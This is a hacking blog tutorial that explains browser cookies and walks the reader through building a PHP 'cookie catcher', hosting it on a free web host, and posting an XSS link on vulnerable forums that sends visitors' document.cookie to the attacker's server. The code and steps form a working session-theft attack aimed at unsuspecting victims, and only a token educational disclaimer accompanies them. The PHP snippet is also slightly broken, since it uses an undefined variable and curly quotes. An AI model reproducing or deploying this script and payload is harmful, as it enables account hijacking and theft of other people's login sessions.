So today I am going to discuss what this cookie catcher tool is and some basic concepts related to it.Hope yous guys like and If you have any problem in it do let me know in comments.
What is Cookie ?
- First of all we will see what is cookie.In simple words a cookie is a special thing which our web browser used to store our information such as user username , passwords, etc.
- Like have you guys ever noticed when we log in to some account like Facebook and click on any page to open it in new tab then why don't we have to log in our username and password again.Even if we close our Facebook account and again open it still there is no need to log in your details again unless you log out your account.
- This thing is done by cookie of our browser.It actually for our ease but think what happens if this cookie got steal,then someone can easily log in our account without even knowing the password.
What is a cookie catcher?
- A cookie catcher tool is nothing but just a php script which captures our browser's cookies.
- Hacker usually sends you a code or link and this link is connected to the cookie catcher.
- When someone clicks on that link,the cookie catcher works and captures all the cookies of the innocent victim and sends them to hacker.
Is making a cookie catcher hard ?
- Now the question arises,is it difficult to make a cookie catcher as it looks like we have to do some php programming etc.
- The answer is no , if you you basic knowledge of php,you can make cookie catcher very easily.
- In fact the hard part is to get someone to click on a link which contains your cookie catcher.
How to Make a Cookie Catcher ?
- Copy the below code in a notepad :
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
- Save this notepad as CookieCatcher.php
- Hurrah !!! You have created a cookie catcher.
How to Use Cookie Catcher ?
- Now the question arises how can we use a cookie catcher.
- First of all create a free account on 0fees.net
- After creating account open cpanel.0fees.net and log in to your account.
- Now under File Management , click on Online File Manager .
- Now open htdocs and upload the CookieCatcher.php file in it.
- Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.
<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>
- Make sure to change user username .
- After posting this will appear like a link and when someone clicks on that link , the cookie catcher automatically creates a file named Cookies.html in the same folder in your account and the cookies of that clicker will come to that file.
NOTE : This tutorial is only for Educational purposes and HACKBOOK is not responsible for any kind of misuse of it .